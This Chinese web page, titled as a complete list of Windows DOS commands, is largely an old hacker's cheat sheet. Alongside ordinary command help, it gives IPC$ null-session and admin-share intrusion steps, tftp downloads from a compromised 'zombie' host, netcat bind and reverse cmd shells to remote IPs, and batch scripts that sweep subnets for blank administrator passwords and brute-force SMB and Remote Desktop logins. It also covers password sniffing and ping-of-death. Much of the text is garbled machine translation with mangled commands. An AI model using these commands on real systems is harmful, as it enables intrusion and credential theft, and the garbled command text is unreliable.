windows的dos命令大全,windows dos 常用命令行(完整)

　　Windows常用命令完整解释

　　复制ipadmin$svv.exe c:或：copyipadmin$*。*.*将其他admini$共享的srv.exe文件(所有文件)复制到本地C:

　　Xcopy要复制的文件或目录树目标地址目录名复制文件和目录树，使用参数/Y不提示覆盖同一个文件。

　　Tftp -i自带IP(以肉机为跳板)获取server.exe c:server . exe登录后，将 IP 的server.exe下载到目标主机c:server.exe参数：-i指的是以二进制模式发送，比如发送exe文件时，如果没有添加-i则为ASCII模式(发送文本文件模式)。

　　Tftp -i对方IP put c:server.exe登录后，上传本地c:server.exe到主机。

　　FTP端口用于向服务器上传文件或执行文件操作，默认端口为21。Bin指二进制传输(可执行文件输入)；

　　默认情况下，它以ASCII格式传输(对于文本文件)

　　路由打印显示IP路由，主要显示网络地址网络地址、子网掩码网络掩码、网关地址网关地址和接口地址接口。

　　查看和处理arp缓存。ARP表示名称解析，负责将IP地址解析为物理MAC地址。Arp -a将显示所有信息。

　　启动程序名或命令/max或/min打开一个新窗口，并最大化(最小化)程序或命令的运行。

　　Mem查看cpu使用情况

　　属性文件名(目录名)查看文件(目录)的属性

　　Attrib文件名-A -R -S -H或A R S H删除(添加)文件的存档、只读、系统和隐藏属性。使用+将其添加为属性。

　　要查看文件，dir参数：/Q显示文件和目录属于哪个用户，/T:C显示文件创建时间，/T:A显示文件上次访问时间，/T:W显示文件上次修改时间。

　　日期/t，时间/t使用此参数，即“日期/T”和“时间/T”，将仅显示当前日期和时间，而无需输入新的日期和时间。

　　指定环境变量名称=分配给变量以设置环境变量的字符。

　　Set显示所有当前环境变量。

　　Set(或其他字符)显示以字符p(或其他字符)开头的所有当前环境变量。

　　暂停暂停批处理程序并显示：请按任意键继续。

　　在if批处理程序中执行条件处理(有关更多说明，请参见if命令和变量)

　　goto标记将cmd.exe指向批处理程序中的标记行(该标记必须是单独的一行，并以冒号开头，例如：“:start”标记)

　　路径批处理文件名从一个批处理程序调用另一个批处理程序(参见call/？)

　　对于一组文件中的每个文件，执行特定的命令(有关命令和变量的更多详细信息，请参见)。

　　打开或关闭打开或关闭回声，仅使用不带参数的回声将显示当前回声设置。

　　Echo在屏幕上显示信息。

　　Echo pass.txt将“信息”保存到pass.txt文件中。

　　Findstr Hello aa.txt在aa.txt文件中查找字符串Hello

　　查找文件名查找文件

　　标题名称更改CMD窗口标题名称

　　颜色值设置cmd控制台的前景色和背景色；0=黑色，1=蓝色，2=绿色，3=浅绿色，4=红色，5=紫色，6=黄色，7=白色，8=灰色，9=浅蓝色，a=浅绿色，B=浅绿色，C=浅红色，D=浅紫色，E=浅黄色。

　　提示名称更改cmd.exe的显示命令提示(将C:D:更改为：EntSky)

　　Net使用ipipc$ /user: 建立ipc空链接

　　Net使用IPI PC $ password /user: username 建立ipc非空链接

　　net use h:IPC $ password /user: username 将对方C:映射到本地位置作为h:

　　Net use h: ipc$将对方C:映射到本地作为h:

　　Net使用ipipc$ /del删除ipc链接

　　Net使用h: /del用h:删除对方到本地的映射。

　　Net用户用户名密码/添加来建立用户

　　网络用户来宾/活动：是，激活来宾用户

　　Net用户来查看那里有哪些用户。

　　Net用户帐户名来查看帐户的属性

　　net local group administrator s username/add user 被添加到administrator中，使其具有管理员权限。注意：在复数administrator后面加上s。

　　Net start查看启动了哪些服务。

　　Net服务名启动服务；(例如，网络启动远程登录、网络启动时间表)

　　网络停止服务名称停止服务

　　网络时间目标ip查看对方时间

　　Net time目标ip /set设置本地计算机的时间与‘目标IP’主机的时间同步，参数/yes可以取消确认信息。

　　查看本地局域网中打开了哪些共享

　　NET IP来检查在另一个局域网中打开了哪些共享。

　　Net显示系统网络设置。

　　网络注销断开共享

　　Net暂停服务名称暂停服务。

　　Net send ip text message 向另一方发送消息

　　Net版本，网络连接类型和正在使用的信息

　　Net查看本地开放的共享

　　网络共享ipc$打开ipc$共享

　　净ipc$/del删除ipc$份额

　　净份额c$ /del删除c:份额

　　Net用户guest 12345以guest用户身份登录后，将密码更改为12345。

　　Net password密码更改系统登录密码

　　Netstat -a检查哪些端口是打开的，netstat -an是常用的。

　　Netstat -n通常用于检查端口的网络连接。

　　Netstat -v来查看正在进行的工作

　　netstat -p协议名称示例：netstat -p tcq/ip检查协议的使用情况(检查tcp/ip协议的使用情况)

　　Netstat -s检查所有正在使用的协议的使用情况。

　　Nbtstat -A ip对方的ip端口136到139中有一个是打开的，可以查看对方最近一次登录的用户名(03之前的用户名)-注意：参数-A要大写。

　　tracert-参数ip(或计算机名)跟踪路由(数据包)，参数：-w number 用于设置超时间隔。

　　Ping -t -l 65550 ip Ping of death(发送大于64K的文件并且一直ping变成ping of death)

　　Ipconfig (winipcfg)用于windows NT和XP(windows 95 98)查看本地ip地址，Ipconfig的可用参数/all 显示所有配置信息。

　　Tlist -t以树形列表显示进程(它是系统的附加工具，默认情况下不安装，位于安装目录的Support/tools文件夹中)

　　Kill -F进程名加-F参数强制一个进程结束(它是系统的附加工具，默认不安装，在安装目录的Support/tools文件夹下)。

　　Del -F文件名可以在添加-F参数后删除只读文件。/AR、/AH、/AS和/AA分别删除只读、隐藏、系统和归档文件，/A-R、/A-H、/A-S和/A-A删除除只读、隐藏、系统和归档文件以外的文件。例如， DEL/AR *。* 表示删除当前目录中的所有只读文件，而 DEL/A-S *。* 表示删除当前目录中除系统文件以外的所有文件。

　　#2第二：

　　删除/S /Q目录或使用：rmdir /s /Q directory /S删除该目录及其下的所有子目录和文件。同时，当使用参数/Q取消删除操作时，系统会直接确认删除。(这两个命令具有相同的功能)

　　移动驱动器路径要移动的文件名存储移动文件名的路径在移动文件后移动文件。使用参数/y取消确认移动目录中存在相同文件的提示，直接覆盖。

　　Fc。TXTWO。TXT3st.txt比较两个文件，并将差异输出到3st。TXT文件。“”和“”是重定向命令。

　　At number打开注册的计划任务。

　　At /delete停止所有计划的任务，使用参数/yes，它不需要确认就直接停止。

　　在number /delete处停止已注册的计划任务。

　　在查看所有计划任务

　　Attime程序名(或命令)/r在某个时间运行另一方的程序并重新启动计算机。

　　手指username @host查看最近有哪些用户登录过。

　　Telnet端口远离登录服务器，默认端口为23。

　　Open ip连接到IP(telnet登录后的命令)

　　在这台机器上直接键入Telnet将进入这台机器的telnet。

　　复制路径文件名1路径文件名2 /y将文件1复制到指定目录作为文件2，同时使用参数/y取消确认。您想要覆盖现有的目录文件。

　　复制c:srv.exe ipadmin$将本地的c:srv.exe复制到对方的admin

　　CPPY 1st.jpg/b 2st.txt/a 3st.jpg隐藏2st.txt的内容在1st.jpg生成一个新的文件在3st.jpg。注意：2st.txt文件头要空三行。参数：/b指二进制文件，/a指ASCLL格式文件。

　　在Verdos窗口下显示版本信息

　　Winver弹出一个窗口显示版本信息(内存大小，系统版本，补丁版本，计算机名称)

　　Format letter /FS: type格式化磁盘，类型：FAT，FAT32，NTFS，例如：Format D: /FS:NTFS

　　Md目录名创建目录

　　替换源文件目录替换文件替换文件

　　任原文件名新文件名重命名文件名

　　目录显示在树结构中，第一个文件夹中的文件名将使用参数-f列出。

　　键入文件名显示文本文件的内容。

　　更多文件名逐屏显示输出文件

　　Doskey命令锁定=字符

　　Doskey to unlock命令=为DOS提供的lock命令(编辑命令行，再次调用win2k命令，创建宏)。比如：lock dir命令：doskey dir=entsky (doskeydir=dir不能用)；解锁：doskey dir=

　　Taskmgr调用任务管理器。

　　Chkdsk /F D:检查磁盘D并显示状态报告；添加参数/f并修复磁盘上的错误。

　　Tlntadmn telnt service admn，键入Tlntadmn选择3，然后选择8，可以将telnet服务的默认端口23更改为任何其他端口。

　　退出cmd.exe程序或目前使用参数/B意味着退出当前批处理脚本而不是cmd.exe。

　　可执行文件的路径文件名设置可执行文件的路径。

　　Cmd启动win2K命令解释窗口。参数：/eff，/en关闭和打开命令扩展。见cmd/？了解更多详情。

　　regedit /s注册表文件名被导入注册表中；参数/S是指安静模式导入，没有任何提示；

　　Regedit /e注册表文件名导出注册表

　　ls filename参数显示或修改NTFS格式的文件访问控制列表(cacls) 3354。参数：/D username:设置为拒绝用户访问；/P username: perm替换指定用户的访问权限；/G username: perm授予指定用户访问权限；Perm可以是：n无，r读，w写，c改(写)，f完全控制；示例：cacls D:test . txt/D pub sets D:test . txt拒绝pub用户访问。

　　Cacls文件名查看文件的访问用户权限列表。

　　REM文本内容在批处理文件中添加注释

　　查看或更改本地网络配置。

　　#4四：

　　IIS服务命令：

　　Iisreset /reboot重启win2k电脑(但是有提示信息说系统会重启)

　　Iisreset /start或stop启动(停止)所有Internet服务。

　　Iisreset /restart停止并重新启动所有Internet服务。

　　Iisreset /status显示所有Internet服务的状态。

　　Iisreset /enable或disable启用(禁用)在本地系统上重新启动Internet服务。

　　Iisreset /rebootonerror当启动、停止或重新启动Internet服务时，如果出现错误，Internet服务将会重新启动。

　　如果无法停止Internet服务，Iisreset /noforce将不会强制终止Internet服务。

　　达到超时(秒)时，Iisreset /timeout Val没有停止Internet服务。如果指定了/rebootonerror参数，计算机将重新启动。默认值为重启20秒、停止60秒和重启0秒。

　　FTP命令：(详细描述稍后给出)

　　ftp的命令行格式是：

　　FTP-V-D-I-N-G[主机名]-V显示远程服务器的所有响应信息。

　　-d使用调试模式。

　　-n限制ftp自动登录，即不使用。netrc文件。

　　-g取消全局文件名。

　　帮助[命令]还是？[命令]查看命令描述

　　Bye或quit终止主机FTP进程并退出FTP管理模式。

　　列出当前远程主机目录。

　　上传或发送本地文件名[上传到主机的文件名]将本地文件传输到远程主机。

　　或者get recv[远程主机文件名][下载到本地后的文件名]从远程主机传输到本地主机。

　　Mget [remote-files]从远程主机接收一批文件到本地主机。

　　Mplocal-files将一批文件从本地主机传输到远程主机。

　　或ls[remote-directory][local-file]列出当前远程主机目录中的文件。如果有本地文件，则将结果写入本地文件

　　将ascii设置为以ASCII模式发送文件(默认值)

　　或以二进制模式发送值的binimage设置)

　　或binimage以二进制模式发送文件。

　　每当贝尔完成文件传输，就会发出警报。

　　Cdup返回到上一个目录。

　　关闭中断与远程服务器的ftp会话(对应于打开)

　　Open host[port]建立与指定ftp服务器的连接，并可以指定连接端口。

　　删除远程主机中的文件

　　删除一批文件

　　mkdirectory-name在远程主机中创建一个目录。

　　重命名[从][到]更改远程主机中的文件名。

　　Rmdir directory-name删除远程主机中的目录。

　　状态显示当前FTP的状态

　　系统显示远程主机系统类型。

　　用户名[密码][帐户]使用另一个用户名登录远程主机。

　　打开主机[端口]重新建立新的连接。

　　提示交互提示模式

　　Macdef定义宏命令

　　lcd改变当前本地主机的工作目录，如果是默认的，将转到当前用户的主目录。

　　Chmod更改远程主机的文件权限

　　当大小写打开时，由MGET命令复制的文件名被传送到本地机器，并且所有文件被转换成小写字母。

　　Cd remote-dir进入远程主机目录

　　Cdup进入远程主机目录的父目录。

　　！在本地机器中执行交互式shell，并退出回到ftp环境，例如！ls*。活力

　　MYSQL命令：

　　Mysql -h主机地址-u用户名-P密码连接MYSQL；如果刚刚安装MYSQL，超级用户root没有密码。

　　(例如：MySQL-h 110 . 110 . 110 . 110-uroot-p 123456)

　　注意：U和root可以不用加空格，其他也一样)

　　退出MYSQL

　　Admin-u username -p旧密码新密码修改密码

　　数据库授权。*以“密码”标识的用户名@登录主机；添加新用户。(注意：与上面不同，下面的命令后面都有一个分号作为命令终止符，因为它们是MYSQL环境中的命令)

　　显示数据库；显示数据库列表。一开始只有两个数据库：mysql和test。Mysql库很重要。它包含了MYSQL的系统信息。当我们修改密码，添加新用户的时候，其实就是用这个库来操作的。

　　使用mysql

　　显示表格；显示库中的数据表

　　描述表名；显示数据表的结构

　　创建库名；简酷

　　使用库名；

　　创建表名(字段设置列表)；剑表

　　数据库库名称；

　　删除表名；删除数据库和删除表

　　删除表名；清除表中的记录。

　　Select * from表名；显示表格中的记录

　　mysqldump-opt school . BBB备份数据库：(命令在DOS的mysqlbin目录下执行)；注意：将数据库school备份到school.bbb文件，这是一个带有任意文件名的文本文件。打开它，你会发现新的东西。

　　win2003系统下的新命令(实用部分):

　　shut down/参数关闭或重新启动本地或远程主机。

　　参数描述：/S关闭主机，/R重新启动主机，/T数字设置延迟时间，范围0到180秒，/A取消启动，/m//IP指定的远程主机。

　　示例：shutdown /r /t 0立即重新启动本地主机(没有延迟)

　　Taskill/parameter进程名称或进程的pid终止一个或多个任务和进程。

　　参数说明：/pid要终止一个进程的pid，可以使用tasklist命令获取每个进程的pid，/IM要终止的进程的进程名，/F强制终止进程，/T终止指定的进程及其子进程。

　　Tasklist显示当前在本地和远程主机上运行的进程、服务和服务进程的进程标识符(PID)。

　　参数说明：/M列出当前进程加载的dll文件，/SVC显示每个进程对应的服务，如果没有参数只列出当前进程。

　　#6六：

　　Linux系统下的基本命令：区分大小写

　　Uname显示版本信息(与win2K的ver相同)

　　Dir显示当前目录文件，ls -al显示包括隐藏文件(与win2K的dir相同)

　　Pwd查询当前目录位置。

　　镉.回到上一个目录，注意CD和之间有一个空格.CD/返回到根目录。

　　卡特彼勒文件名查看文件内容

　　Cat abc.txt将内容写入abc.txt文件。

　　更多文件名逐页显示文本文件。

　　复制cp文件

　　Mv移动文件

　　Rm文件名删除文件，RM-目录名删除目录和子目录。

　　Mkdir目录名创建目录

　　Rmdir删除子目录，目录中没有文档。

　　Chmod设置文件或目录的访问权限。

　　Grep在档案中查找字符串。

　　差异文件的比较

　　查找文件搜索

　　当前日期和时间。

　　谁查询当前和你用同一台机器的人以及登录时间和地点。

　　w查询当前计算机用户的详细信息。

　　Whoami检查他的帐户名称。

　　群组查看某人的群组。

　　Passwd更改密码

　　历史，检查你的命令。

　　Ps显示流程状态

　　Kill停止一个进程。

　　Gcc黑客通常用它来编译C语言编写的文件。

　　Su权限转换为指定的用户。

　　Telnet IP telnet连接到另一台主机(同win2K)，当bash$出现时，连接成功。

　　Ftp ftp连接到服务器(与win2K相同)

　　附：批处理命令和变量

　　1:对于命令和变量的基本格式：

　　FOR/parameter % variable in(set)do command[command _ parameters]% variable:指定单字母可替换参数，如：%i，而：%%i用于指定变量，而：% i %用于调用变量，变量区分大小写(%i不等于%i)。

　　每个批处理中可以处理10个变量，从%0到% 9，其中% 0默认用于批处理文件名，而%1是使用该批处理时输入的第一个值。类似地，% 2-%9是指输入的第2-9个值；示例：net use ipipc $ pass/user:用户中的ip为%1，pass为% 2，用户为%3。

　　(set):指定一个文件或一组文件，可以使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254)，{ (1 1 254)第一个 1 指初始值，第二个 1 指增量，第三个 254 。(1 -1 254)描述：从254到1}

　　命令：指定要对文件执行的命令，如net use命令；如果要执行多个命令，可以通过添加以下命令来分隔这个房间：

　　Command_parameters:为特定命令指定参数或命令行开关。

　　IN (set):指(set)中的值；DO命令：指执行命令

　　参数：/L是指增量形式{当(set)是增量形式}时；/F是指从文件中连续取值，直到取完为止{当(set)是一个文件，比如(d:pass.txt)}。

　　用法示例：

　　@关闭回声

　　Echo使用格式：test.bat *。*.*测试. txt

　　对于(1 1 254)中的/l%% g，请回显% 1。%% g test.txt净使用% 1。%% g/user: administrator find 命令已成功完成 test.txt

　　另存为test.bat描述：依次尝试为指定的C类网段的254 IP建立管理员密码为空的IPC$连接，如果成功，将IP保存在test.txt中

　　/L表示增量形式(即从1-254或254-1)；输入IP的前三位数字：*。*.*是批处理的默认% 1；%%G是变量(ip的最后一位)；用于分隔echo和net use命令；表示ipc$建立后，在结果中使用find查看是否有‘命令成功完成’信息；% 1;%% g是一个完整的IP地址；(1 1 254)是指起始值、递增量和结束值。

　　@关闭回声

　　Echo使用格式：ok.bat ip

　　为/F %%i IN (D:user.dic)做smb.exe % 1% % I D:pass . DIC 200

　　另存为：ok.exe描述：输入一个IP后，使用字典文件d:pass.dic求解d:user.dic中的用户密码，直到完全取文件中的值。%%i是用户名；%1是输入的IP地址(默认)。

　　2.2:if命令和变量的基本格式：

　　IF [not] errorlevel数字命令语句如果程序运行并最终返回等于或大于指定数字的退出代码，则指定条件为 true 。

　　示例：IF errorlevel 0命令是指程序执行后返回值为0时，值行后的命令；如果非错误级别1命令意味着如果程序执行返回的值不等于1，将执行下面的命令。

　　0表示发现并成功执行(真)；1表示没有发现或执行(假)。

　　IF [not] string 1==string 2命令语句如果指定的文本字符串匹配(即string 1等于string 2)，将执行下面的命令。

　　示例：“if %2%==4 goto start 表示：如果输入的第二个变量是4，则执行以下命令(注意：调用变量时，添加% variable name%和)

　　IF [not] exist文件名命令语句如果指定的文件名存在，下面的命令将被执行。

　　例如：“如果不是nc.exe goto end”的意思是：如果没有找到nc.exe文件，跳转到“:结束”标签。

　　IF [not] errorlevel数字命令语句else命令语句或if [not] string 1==string 2命令语句else命令语句或IF [not] exist文件名命令语句else命令语句plus:else命令语句后，指前面条件不成立时else后的命令。注意：else必须在同一行上才有效。

　　当有del命令时，需要将del命令的所有内容括起来，因为del命令只能在单行上执行，使用后相当于单行；比如： ifexisttest . txt . else echo test . txt . missing ，注意.在命令中。

　　(II)系统外部命令(需要下载所有相关工具):

　　1.瑞士军刀：nc.exe

　　参数描述：

　　-h查看帮助信息

　　-三维背景模式

　　-e prog程序重定向，一连接就执行[危险]

　　-秒延迟间隔

　　-l侦听模式，用于入站连接。

　　-L监控模式，连接关闭后继续监控，直到CTR C。

　　-n IP地址，无域名。

　　-o胶片记录十六进制传输。

　　-p[ space] port本地端口号

　　-r随机本地和远程端口

　　-t使用Telnet进行交互。

　　-u UDP模式

　　-v详细输出，用-vv会更详细。

　　-w数字超时延迟间隔

　　-z关闭输入和输出(用于锚点扫描)

　　基本用法：

　　Nc -nvv 192.168.0.1 80连接到192.168.0.1主机的端口80。

　　Nc -l -p 80打开这台机器的TCP 80端口并监听

　　锚192.168.0.1的80-1024端口80-1024

　　NC-L-p 5354-T-E C:winntsystem32cmd.exe将远程主机的cmdshell绑定到远程主机的TCP 5354端口。

　　NC-T-E C:winntsystem32cmd.exe 192.168.0.2 5354确定远程主机的cmdshell，反向连接192 . 168 . 0 . 2的5354端口。

　　高级用法：

　　Nc -L -p 80作为一个蜜罐，1点开机，一直监听80口，直到CTR C。

　　Nc -L -p 80 c:log.txt作为蜜罐，从2: 0开始一直监听80口，直到CTR C，将结果输出到c:log.txt。

　　Nc -L -p 80 c:honeyport.txt作为蜜罐使用。还可以起到3-1传输文件的作用：打开并不断监听80端口直到CTR C，将c:honeyport.txt的内容发送到管道中。

　　Type.exe: Honeyport NC-L-P 80作为蜜罐使用。用3-2:打开80端口到CTR C，将c:honeyport.txt的内容发送到管道中，也可以起到传输文件的作用。

　　本机使用：nc -l -p本地端口

　　使用：NC-e cmd.exe本地IP -p本地端口*另一台主机上的win2K。

　　Nc -e /bin/sh本地IP -p本地端口*linux，unix反向连接突破对方主机的防火墙。

　　本地使用：nc -d -l -p本地端口要传输的文件的路径和名称

　　在另一台主机上，使用nc -vv本地IP本地端口的路径和名称来存储文件，并将文件发送到另一台主机。

　　注意：

　　管道命令

　　或重定向命令。例如：tlntadmn test.txt是指将test.txt的内容赋给tlntadmn的命令。

　　@表示执行@后的命令，但不会显示(后台执行)；示例：@ dir c: winnt d:log.txt的意思是：后台执行dir，并将结果存储在d:log.txt中。

　　与“”的区别是指：覆盖；表示：保存到(添加到)。

　　例如，@dir c:winnt d:log.txt和@dir c:winnt d:log.txt分别执行两次。看：第二个结果保存，而第二个结果只有一次，因为第二个结果覆盖了第一个。

　　#8八：

　　2.扫锚工具：xscan.exe

　　基本格式

　　Xscan -host start IP[- end IP]检测项[其他选项]扫描锚的‘start IP to end IP’段中的所有主机信息。

　　Xscan -file主机列表文件名检测项目[其他选项]扫描“主机IP列表文件名”中的所有主机信息

　　试验项目

　　-active检测主机是否处于活动状态。

　　-操作系统检测远程操作系统类型(通过NETBIOS和SNMP协议)

　　-port检测常用服务的端口状态。

　　-ftp检测ftp弱密码

　　-pub检测FTP服务匿名用户的写权限。

　　-pop3检测pop 3-服务器弱密码

　　-smtp检测smtp服务器漏洞

　　-sql检测SQL-Server弱密码

　　-smb检测到NT服务器弱密码

　　-iis检测到iis编码/解码漏洞

　　-cgi检测cgi漏洞。

　　-nasl加载Nessus攻击脚本。

　　-all检测以上所有项目。

　　其他选项

　　-i适配器号设置网络适配器，适配器号可以通过-l 参数获得。

　　-l显示所有网络适配器

　　-v显示详细的扫描进度。

　　-p跳过没有响应的主机。

　　-o跳过未检测到开放端口的主机。

　　-t number of concurrent threads，number of concurrent hosts指定最大并发线程数和并发主机数。默认数字是100，10。

　　-日志文件名指定扫描报告文件名(后缀：TXT或HTML文件)

　　用法示例

　　xscan-host 192.168.1.1-192.168.255.255-all-active-p检测192 . 168 . 1 . 1-192 . 168 . 255 . 255网段中主机的所有漏洞，跳过无响应的主机。

　　xscan-host 192 . 168 . 1 . 1-192 . 168 . 255 . 255-port-sm b-T150-O检测网段中主机的标准端口状态192.168.168.255.255，nt弱密码用户，最大。

　　xscan-file hostlist.txt-port-CGI-t200，5-v-o检测“host list . txt”文件中列出的所有主机的标准端口状态和CGI漏洞。并发线程的最大数量是200。最多同时检测五台主机，显示详细的检测进度。跳过未检测到开放端口的主机。

　　3.命令行嗅探器：xsniff.exe

　　它可以捕获局域网中的FTP/SMTP/POP3/HTTP协议密码。

　　参数描述

　　-tcp输出tcp数据报

　　-udp输出udp数据报

　　-ICMP输出ICMP数据报

　　-传递过滤器密码信息。

　　-在后台隐藏运行。

　　-host解析主机名。

　　-addr IP地址过滤器IP地址

　　-端口端口过滤器端口

　　-log filename将输出保存到文件中。

　　-asc以ASCII格式输出。

　　-hex以十六进制形式输出。

　　用法示例

　　xsniff . exe-pass-hide-log pass.log在后台运行嗅探密码，并将密码信息保存在pass . log文件中。

　　xsniff . exe-tcp-udp-ASC-Addr 192.168.1.1嗅探192 . 168 . 1 . 1，过滤TCP和UDP信息并以ASCII格式输出。

　　4.终端服务密码破解：tscrack.exe

　　参数描述

　　-h显示使用帮助。

　　-v显示版本信息

　　-s型屏幕上的解密功能。

　　-b密码错误时发出的声音

　　-t同时发出多个连接(多线程)

　　-N阻止目标服务器上的系统日志条目

　　-U uninstall删除tscrack组件。

　　-f在-f后面使用密码。

　　-F间隔时间(频率)

　　-l在-l后面使用用户名。

　　-w在-w后使用密码字典。

　　-p在-p后面使用密码。

　　-D登录到主页

　　用法示例

　　tsck 192 . 168 . 0 . 1-l administrator-wpass . DIC远程使用的密码字典文件破解主机的管理员登录密码。

　　TSCRACK 192.168.0.1-L管理员-P123456使用密码123456远程登录192.168.0.1的管理员用户。

　　@如果不存在ipcscan.txt转到noscan

　　@ for/f tokens=1 delims= % % I in(3389 . txt)请务必调用hack.bat %%i

　　nscan

　　@echo 3389.txt没有找到或扫描失败

　　(保存为3389.bat)(假设用SuperScan或其他锚扫描器扫描一批3389的主机IP列表文件3389.txt)

　　389.BAT的意思是：从3389.bat文件中取一个IP，然后运行hack.bat

　　@如果不存在，tscrack.exe去noscan

　　@ ts crack % 1-l administrator-w pass . DIC rouji . txt

　　:无扫描

　　@回声tscrack.exe没有找到或扫描失败

　　(另存为hack.bat)(运行3389.bat是可以的，3389.bat、hack.bat、3389.txt、pass.dic、tscrack.exe在同一个目录；可以等结果)

　　Hack.bat的意思是：运行tscrack.exe用字典对3389.txt中所有主机的管理员密码进行破解，并将破解结果保存在rouji.txt文件中。

　　5.其他：

　　Shutdown.exe

　　关机IP地址T:20 20秒后对方的NT会自动关机(Windows 2003系统自带工具，要下载这个工具才能在Windows2000下使用。它在之前的Windows 2003 DOS命令中有详细描述。)

　　Fpipe.exe(TCP端口重定向工具)在第二篇文章(端口重定向绕过防火墙)中有详细解释。

　　IPE-L 80-S 1029-R 80 www.sina.com.cn当有人扫描并锚定你的80端口时，他扫描的结果将是www.sina.com.cn的主机信息。

　　Fpipe -l 23 -s 88 -r 23目标IP通过端口将本机发送的23端口Telnet请求重定向到目标IP，然后通过端口88发送到目标IP的端口23。(建立Telnet时本地计算机使用的88端口连接到目标IP)然后：Telnet 127.0.0.1(本地IP)直接连接到目标IP的23端口。

　　OpenTelnet.exe(远程开放远程登录工具)

　　Opentelnet.exe账号密码ntlm认证方式telnet端口(无需上传ntlm.exe破坏微软的认证方式)直接远程打开对方的telnet服务后，就可以用telnet ip连接到对方。

　　NTLM身份验证方法：0:不使用NTLM身份验证；1:先尝试NTLM认证，如果失败，再使用用户名和密码；2:仅使用NTLM认证。

　　ResumeTelnet.exe(open telnet附带的另一个工具)

　　resumetelnet.exe的IP账号密码通过telnet连接到对方后，使用该命令恢复对方的Telnet设置，同时关闭Telnet服务。

　　6.FTP命令的详细解释：

　　FTP命令是互联网用户最常用的命令之一。了解并灵活运用FTP的内部命令，可以大大方便用户，事半功倍。想学习下载后台FTP，必须学习FTP说明。

　　FTP的命令行格式是：

　　FTP-v-d-I-n-g[主机名]，其中

　　-v显示远程服务器的所有响应信息；

　　-n限制ftp自动登录，即不使用；n etrc文件；

　　-d使用调试模式；

　　-g取消全局文件名。

　　FTP中使用的内部命令如下(括号表示选项):

　　1.[cmd[args]]:在本地机器上执行交互shell，退出回到ftp环境，比如：ls*。活力

　　2.$ macro-ame[args]:执行宏定义宏名。

　　3.account[password]:成功登录远程系统后，提供访问系统资源所需的补充密码。

　　4.追加本地文件[远程文件]:将本地文件追加到远程系统主机。如果未指定远程系统文件名，将使用本地文件名。

　　5.ascii:使用ascii类型的传输模式。

　　6 .铃：每执行一个命令，电脑就响一次。

　　7.bin:使用二进制文件传输方法。

　　8.bye:退出ftp会话过程。

　　9.case:使用mget时，将远程主机的文件名的大写字母变成小写字母。

　　10.cd remote-dir:输入远程主机目录。

　　11.cdup:输入远程主机目录的父目录。

　　12.chmod模式文件名：将远程主机文件文件名的访问模式设置为mode，比如chmod 777a.out。

　　13.close:中断与远程服务器的ftp会话(对应open)。

　　14 . Cr:ass CII传输文件时，回车和换行符转换为换行符。

　　15 .删除远程文件：删除远程主机文件。

　　16.debug[debug-value]:设置调试模式，显示发送到远程主机的每个命令，比如deb up 3。如果设置为0，调试将被取消。

　　17.dir[remote-dir][local-file]:显示远程主机目录并将结果存储在本地文件中。

　　18 .断开：与关闭相同。

　　9.表单格式：设置文件传输模式为格式，默认为文件模式。

　　20 .获取远程文件[本地文件]:将远程主机的远程文件传输到本地硬盘的本地文件。

　　21.glob:设置mdelete、mget、mput的文件扩展名。默认情况下，文件名不会被扩展，这与命令行的-g参数相同。

　　22.hash:每传输1024个字节，显示一个散列符号(#)。

　　23.help[cmd]:显示ftp内部命令cmd的帮助信息，如：help get24.idle[seconds]:将远程服务器的睡眠定时器设置为[seconds]秒。

　　25.image:设置二进制传输模式(与二进制相同)。

　　26.lcd[dir]:将本地工作目录切换到dir。

　　27.ls[remote-dir][local-file]:显示远程目录remote-dir，并将其存储在本地文件local-file中。

　　28.macdef宏名：定义一个宏。当遇到macdef下的空线时，宏定义结束。

　　29.mdelete[remote-file]:删除远程主机文件。

　　30.mdir remote-files local-file:类似于dir，但是可以指定多个远程文件，比如mdir *。o *。zipoutfile。

　　31.mget remote-files:传输多个远程文件。

　　32.mkdir dir-name:在远程主机中创建目录。

　　3.MLS远程文件本地文件：与nlist相同，但是可以指定多个文件名。

　　34.mode[modename]:将文件传输模式设置为modename，默认为流模式。

　　35.modtime文件名：显示远程主机文件的最后修改时间。

　　36.mput local-file:将多个文件传输到远程主机。

　　37 .较新的文件名：如果远程机器中的文件名的修改时间比本地硬盘上的同名文件的修改时间新，则该文件将被重新传输。

　　38.nlist [remote-dir] [local-file]:显示远程主机目录的文件列表，并将其存储在本地硬盘的本地文件中。

　　39 . nmap[in模式

　　outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。

　　40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

　　41.open host[port]：建立指定ftp服务器连接，可指定连接端口。

　　42.passive：进入被动传输方式。

　　43.prompt：设置多个文件传输时的交互提示。

　　44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。

　　45.put local-file[remote-file]：将本地文件local-file传送至远程主机。

　　46.pwd：显示远程主机的当前工作目录。

　　47.quit：同bye，退出ftp会话。

　　48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

　　49.recv remote-file[local-file]：同get。

　　50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

　　51.rhelp[cmd-name]：请求获得远程主机的帮助。

　　52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。

　　53.rename[from][to]：更改远程主机文件名。

　　54.reset：清除回答队列。

　　55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。

　　56.rmdir dir-name：删除远程主机目录。

　　57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。

　　58.send local-file[remote-file]：同put。

　　59.sendport：设置PORT命令的使用。

　　60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

　　61.size file-name：显示远程主机文件大小，如：site idle 7200。

　　62.status：显示当前ftp状态。

　　63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。

　　64.sunique：将远程主机文件名存储设置为只一(与runique对应)。

　　65.system：显示远程主机的操作系统类型。

　　66.tenex：将文件传输类型设置为TENEX机的所需的类型。

　　67.tick：设置传输时的字节计数器。

　　68.trace：设置包跟踪。

　　69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。

　　70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

